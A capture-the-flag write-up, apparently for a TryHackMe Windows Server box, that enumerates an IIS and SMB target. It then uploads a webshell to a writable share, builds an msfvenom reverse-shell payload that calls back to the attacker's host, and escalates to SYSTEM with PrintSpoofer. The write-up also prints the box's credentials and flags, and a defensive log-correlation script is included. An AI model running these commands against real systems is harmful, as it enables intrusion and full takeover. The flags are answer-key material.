
Mission
“You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.”
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
- User.txt
- Root.txt
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Submit the flags discovered to the dashboard
- Only the IP address assigned to your machine is in scope
- Find and report ALL vulnerabilities (yes, there is more than one path to root)
Nmap scan
I started out this box with a regular nmap scan which found the following ports open.
– 80/tcp http Microsoft IIS httpd 10.0
– 135/tcp msrpc Microsoft Windows RPC
– 139/tcp netbios-ssn Microsoft Windows netbios-ssn
– 445/tcp microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
– 3389/tcp ms-wbt-server Microsoft Terminal Services
nmap -sV -sC 10.10.154.20

Also ran a full port scan to see if there were any other ports that I had missed. It found one new port at 49663 running another IIS.
nmap -p- -T5 10.10.154.20
Port 80 – HTTP
Hit a standard IIS startpage. Tried GoBuster and Dirb but they could not find any subdirectories.

Port 139 – SMB
For SMB I ran a Python script called smbmap that can enumerate SMB shares.
smbmap.py -u anonymous -p anonymous -H 10.10.154.20

Found a folder called “nt4wrksv” with READ, WRITE access. Inside the folder there was a password.txt file.


Used CyberChef to decode the encoded usernames and passwords.
Decoding from Base64 (Lucky guess on the format…)

Bob – !P@$$W0rD!123
Bill – Juw4nnaM4n420696969!$$$
The new accounts don't seem to have any further access through SMB.
An Nmap scan for vulnerabilities showed a potential exploit, CVE-2017-0143.

Port 3389 – RDP
Tried logging into the machine using RDP with Remmina and the two found accounts; it didn't work.

Port 49663 – Another IIS

Tried a new GoBuster-scan on the second IIS I found and found the folder “nt4wrksv”, same as in the SMB-shares.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 --timeout 20s -u http://10.10.154.20:49663
It seems it's the same folder, as I can access “http://10.10.154.20:49663/nt4wrksv/passwords.txt” and get the same content as seen before.
Since we have READ, WRITE to this folder I could upload an .aspx-webshell with smbclient and grab the user.txt.

THM{fdk4ka34vk346ksxfr21tg789ktf45}
I also tried crafting a reverse tcp shell using msfvenom and uploaded it to the target.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.208.50 LPORT=4444 -f aspx -o pwn.aspx
Browsing the pwn.aspx returned a shell to my netcat-listener
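From the defender's side, the upload-then-browse step above leaves a trail that can be correlated: a script file written over SMB and then requested over HTTP. The following is an added example, not part of the original write-up; the log entries are constructed, and it assumes Security event 5145 (Audit Detailed File Share) and IIS W3C logging are enabled and that the share name matches the URL path, as it does for nt4wrksv here.

```python
from datetime import datetime, timedelta

# Constructed sample data. SMB_WRITES mimics fields of Windows Security
# event 5145 with write access (requires "Audit Detailed File Share").
SMB_WRITES = [
    {"time": "2021-03-01 10:02:11", "share": r"\\*\nt4wrksv", "file": "pwn.aspx",
     "user": "ANONYMOUS LOGON", "src": "10.10.208.50"},
    {"time": "2021-03-01 09:00:00", "share": r"\\*\nt4wrksv", "file": "notes.txt",
     "user": "Bob", "src": "10.10.20.7"},
]
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2021-03-01 10:01:00 10.10.154.20 GET /nt4wrksv/passwords.txt - 49663 - 10.10.208.50 200
2021-03-01 10:03:40 10.10.154.20 GET /nt4wrksv/pwn.aspx - 49663 - 10.10.208.50 200
2021-03-01 10:05:00 10.10.154.20 GET /iisstart.htm - 80 - 10.10.20.7 200
"""
SCRIPT_EXT = (".aspx", ".ashx", ".asmx", ".asp")  # server-executed extensions

def parse_w3c(text):
    """Parse IIS W3C log text using its own #Fields directive."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def find_dropped_scripts(smb_writes, iis_rows, window=timedelta(minutes=30)):
    """Alert when a script written over SMB is requested over HTTP soon after."""
    fmt = "%Y-%m-%d %H:%M:%S"
    alerts = []
    for w in smb_writes:
        name = w["file"].replace("\\", "/").lower()
        if not name.endswith(SCRIPT_EXT):
            continue
        # Assumption: the share name is also the URL path segment.
        share = w["share"].rsplit("\\", 1)[-1].lower()
        written = datetime.strptime(w["time"], fmt)
        for r in iis_rows:
            hit = datetime.strptime(r["date"] + " " + r["time"], fmt)
            if (r["cs-uri-stem"].lower() == f"/{share}/{name}"
                    and timedelta(0) <= hit - written <= window):
                alerts.append({"file": name, "writer": w["src"], "smb_user": w["user"],
                               "requester": r["c-ip"], "port": r["s-port"]})
    return alerts

if __name__ == "__main__":
    for alert in find_dropped_scripts(SMB_WRITES, parse_w3c(IIS_LOG)):
        print("ALERT", alert)
```

The underlying fix is to remove anonymous write access from the share or to stop serving the share's directory through IIS; the correlation only catches the condition after the fact.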

From here I uploaded PrintSpoofer.exe, which I grabbed from https://github.com/dievus/printspoofer. PrintSpoofer is an exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10. To escalate privileges, the service account must have SeImpersonate privileges.
Browsed to c:\inetpub\wwwroot\nt4wrksv and executed
PrintSpoofer.exe -i -c cmd

Which gave me NT AUTHORITY\System 🔥

And the final flag, root.txt

THM{1fk5kf469devly1gl320zafgl345pv}
Conclusion
This challenge was really fun and well made. I focused a lot on keeping notes and taking printscreens to be able to write a short report/summary of the findings I made in the end, which I normally haven't done so far.
At first it was difficult to find anything useful since the first IIS didn't give me anything to work with. It was not until I found the second one that I had something to work with, as the password file found through SMB was just a rabbit hole that led nowhere and was designed to trick you into thinking you found something valuable.
After I found out I could upload files to the SMB share with WRITE access, I tried a simple webshell which got me user access and the first flag. To escalate my privileges I had to turn to Google to find out about the PrintSpoofer exploit and how to use it. That was nothing I have worked with earlier and a good exploit to learn about; it might come in handy in future boxes.
– Kevin “Frigol33t” Rehnberg